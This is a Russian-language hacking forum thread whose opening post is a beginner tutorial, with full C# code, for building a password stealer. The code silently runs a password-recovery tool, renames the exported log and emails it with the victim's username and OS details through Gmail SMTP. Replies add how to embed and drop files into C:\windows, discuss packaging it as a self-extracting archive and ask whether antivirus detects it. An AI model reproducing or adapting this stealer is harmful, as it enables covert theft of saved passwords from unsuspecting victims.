Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Кодинг / .NET / C#
 
  Страница 1
  , 21:59   #1
Новичок
 
Регистрация: 20.03.2011
Сообщений: 10

Репутация: 0 / 0
По умолчанию пишем стилер с отчетом на почту

Доброго времени суток
гайд рассчитан в первую очередь на новичков, батьки проходим мимо
И так, для начала нам нужен "ms visual studio" с c#(шарп, не путаем с с++), я использовал 2010 студию чего и вам рекомендую, тк там есть 4нет фреймфорк(начиная с 4 версии можно нормально отправлять почту). Также нужен "MPR" (Multi Password Recovery)- с помощью этой утилиты мы будем вытягивать пароли.(где скачать? гугл )

1. Запускам студию, создаем консольный проект (.net Framework 4.0)
IMAGE http://s51.radikal.ru/i134/1103/0f/fad620b201ce.png

IMAGE http://s50.radikal.ru/i129/1103/ce/df1e25766972.png

2. С debug'a ставим на release (по сути разницы мало... это не с++, но всетаки)
IMAGE http://s60.radikal.ru/i169/1103/15/a3cef613230c.png

3.Теперь нужно сделать нашу консолку невидимой, как? все очень просто, достаточно поменять тип на Windows application в Solution Explorere..
IMAGE http://i023.radikal.ru/1103/80/0e838e5bc607.png

IMAGE http://i022.radikal.ru/1103/e4/18c53ac78794.png

4.Скачиваем MPR и скидываем "MPR.exe, HookLib.dll, block_reader.sys" к нашему зловреду (по дефолту C:\Users\юзверьнейм\Documents\Visual Studio 20**\Projects\имя проекта\bin\release)
5.Теперь наверное самое интересное, пишем наш зловещий код
заходим в program.cs
вверху, там где using'ы добавляем:

code:
using System;
using System.Collections.Generic;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Net.Mime;
в main пишем:
code:
        static void Main(string[] args)
        {
            start("MPR.exe", "/export");//запускаем Мпр и экспортируем пароли
            start("cmd.exe"," /c ren *.mpf log.mpf");//переименовываем "буквыбуквы.мпф" на "наши буквы.мпф"=)
          //аттачим лог и отправляем почту, (сервер, порт, мыло, пароль)
            sendMail("smtp.gmail.com",587,"lol@gmail.com","qwerty123");
        }
чуть ниже main'a

code:
        static void start(string file, string command) //файл параметр
        {
            try
            {
                Process p1 = new Process();
                p1.StartInfo.UseShellExecute = true;
                p1.StartInfo.RedirectStandardOutput = false;
                p1.StartInfo.FileName = file;//имя приложения
                p1.StartInfo.Arguments = command;//експорт паролей в файл
                p1.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;//скрытый запуск
                p1.Start();//старт
                p1.WaitForExit();//ждать пока запускаемое приложение закроеться
            }
            catch { }
        }
        static public void sendMail(string server,int port,string mail,string pass)
        {
            SmtpClient client = new SmtpClient(server, port); //smtp сервер п порт (можно 25)
            client.EnableSsl = true;
            client.Credentials = new System.Net.NetworkCredential(mail, pass); //почта и пароль
            MailMessage msg = new MailMessage();
            msg.From = new MailAddress(mail);//от кого письмо
            msg.To.Add(new MailAddress(mail));//кому письмо
            msg.Subject = "stealer by byte";//заголовок мессаги
            msg.Body = "infoрматион=): " +
                " UserName: " + Environment.UserName + 
                " DomainName: " + Environment.UserDomainName + 
                " OSver: " + Environment.OSVersion; //содержимое
           
            string file = String.Format("log.mpf");
            Attachment attach = new Attachment(file);//аттачим наш лог
            ContentDisposition disposition = attach.ContentDisposition;
            attach.TransferEncoding = TransferEncoding.QuotedPrintable; //кодировка гумно, рекомендую поопробывать поставит другие...
            client.Timeout = 999999999; //таймаут, как показывает практика 999999999 как раз хватит =)
            msg.Attachments.Add(attach);// добавляем аттач
            try
            {
                client.Send(msg);//отправляем мессагу
            }
            catch { }
        }
собственно шаманство с кодом завершено, остается только вписать свою почту\пароль\и смтп сервер
code:
sendMail("smtp.gmail.com",587,"lol@gmail.com","qwerty123");
6.Ну и что дальше скажите вы?, жмем ф6 для создания виря, если все правильно то в папке bin\release появится .ехешник, можете запустить для проверки.
теперь остается малое, запилить сфх архив(думаю каждый знает как)

Если возникнут какие-то ошибки\вопросы пишите в тему
Удачи
 
Пользователь вне форума    
Наши Спонсоры
  , 20:29   #2
1nt
Постоянный
 
Аватар для 1nt
 
Регистрация: 19.11.2010
Сообщений: 733

Репутация: 141 / 2
По умолчанию

нда, трой с 4-ым фрейморков "много систем" инфицирует.
имхо, такое же написать под 2-ой было бы намного лучше.
__________________
[B][COLOR="Red"][URL="https://hpc.name/showthread.php?t=26401#post284052"]Кейлогер актуален[/URL][/COLOR][/B]
Пользователь вне форума    
  , 20:44   #3
Новичок
 
Регистрация: 20.03.2011
Сообщений: 10

Репутация: 0 / 0
По умолчанию

можно и под 2й, если отсыль к примеру на фтп использовать...
 
Пользователь вне форума    
  , 21:00   #4
Местный
 
Аватар для dpe_X
 
Локация: Минск
Регистрация: 09.09.2010
Сообщений: 152

Репутация: 18 / 1
По умолчанию

ага еще в архив фреймворк 4 всунуть..
 
Пользователь вне форума    
  , 21:05   #5
Новичок
 
Регистрация: 20.03.2011
Сообщений: 10

Репутация: 0 / 0
По умолчанию

Цитата:
Сообщение от dpe_X Посмотреть сообщение
ага еще в архив фреймворк 4 всунуть..
норм чо, вебинсталлер к примеру или весь фрейм, едак ~500 мб
 
Пользователь вне форума    
  , 00:18   #6
Форумчанин
 
Аватар для KalkeN
 
Регистрация: 13.07.2009
Сообщений: 64

Репутация: 1 / 0
По умолчанию

что такой стилер ? для чего надо?
 
Пользователь вне форума    
  , 00:45   #7
Banned
 
Локация: HPC
Регистрация: 04.12.2010
Сообщений: 251

Репутация: 31 / 0
По умолчанию

Цитата:
Сообщение от KalkeN Посмотреть сообщение
что такой стилер ? для чего надо?
Стиллер - с англ. вор.

Он нужен для кражи паролей с компьютера жертвы.
 
Пользователь вне форума    
  , 20:29   #8
Форумчанин
 
Аватар для KalkeN
 
Регистрация: 13.07.2009
Сообщений: 64

Репутация: 1 / 0
По умолчанию

а чем отличается от пинча?
 
Пользователь вне форума    
  , 20:47   #9
Новичок
 
Регистрация: 11.12.2010
Сообщений: 2

Репутация: 0 / 0
По умолчанию

Цитата:
Сообщение от KalkeN Посмотреть сообщение
а чем отличается от пинча?
Стилер это название группы программ в которую входит пинч istiler и тд.
Так что считай ничем.
 
Пользователь вне форума    
  , 23:26   #10
Местный
 
Аватар для masych
 
Локация: 127.0.0.1
Регистрация: 28.06.2010
Сообщений: 236

Репутация: -51 / 0
По умолчанию

Лучше напиши как в VS вставить файлы в exe файл.
 
Пользователь вне форума    
  , 09:54   #11
Новичок
 
Регистрация: 20.03.2011
Сообщений: 10

Репутация: 0 / 0
По умолчанию

Цитата:
Сообщение от masych Посмотреть сообщение
Лучше напиши как в VS вставить файлы в exe файл.
эмм в ресурсы чтоль?
ну это просто...
IMAGE http://s51.radikal.ru/i133/1104/16/727cfda105f0.png

бросаешь файлы какие нужно
потом пишешь код для извлечения. к примеру:
source:
using (FileStream fs = new FileStream(@"C:\windows\lol.dll", FileMode.Create, FileAccess.Write))
{
fs.Write(Properties.Resources.имя ресурса, 0, Properties.Resources.имя ресурса.Length);
}
 
Пользователь вне форума    
  , 00:26   #12
Местный
 
Аватар для masych
 
Локация: 127.0.0.1
Регистрация: 28.06.2010
Сообщений: 236

Репутация: -51 / 0
По умолчанию

Цитата:
теперь остается малое, запилить сфх архив(думаю каждый знает как)
Зачем тогда rar нужен? Многие проверяют на архив файлы.)

Цитата:
бросаешь файлы какие нужно
потом пишешь код для извлечения. к примеру:
Тогда можно сразу и собрать? Допиши код.
 
Пользователь вне форума    
  , 12:21   #13
Новичок
 
Аватар для TeRoR4Ek
 
Локация: Saint-P
Регистрация: 14.01.2011
Сообщений: 12

Репутация: 0 / 0
По умолчанию

{byte} Напиши подробнее плз
__________________
☮TeRoR4Ek☮

Последний раз редактировалось TeRoR4Ek; 12.04.2011 в 12:43.
Пользователь вне форума    
  , 07:14   #14
НЕ ПРОВЕРЕН
 
Регистрация: 22.11.2012
Сообщений: 2

Репутация: 0 / 0
По умолчанию

Я что то не совсем понимаю вот я сделал все работает но...
Получается что отчет приходит на почту от самого себя себе из этого получается что я не могу скачать отчет из письма!(Подскажите как это исправить по идее то должно приходить с другого мыла?)
 

Последний раз редактировалось CoderX; 22.11.2012 в 07:29.
Пользователь вне форума    
  , 21:34   #15
Новичок
 
Регистрация: 03.01.2012
Сообщений: 27

Репутация: 0 / 0
По умолчанию

Сильно палится?
 
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Пишем трояна megapupsik C++ Builder 19 08.05.2013 12:22
[Статья] пишем стилер с отправкой на почту [.bat] voron23 Другие Языки 18 21.05.2012 20:07
Hiden Radmin 3 + IP на почту (dynamic & static) + RemCam megapupsik Софт для Windows 67 22.11.2011 02:11



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.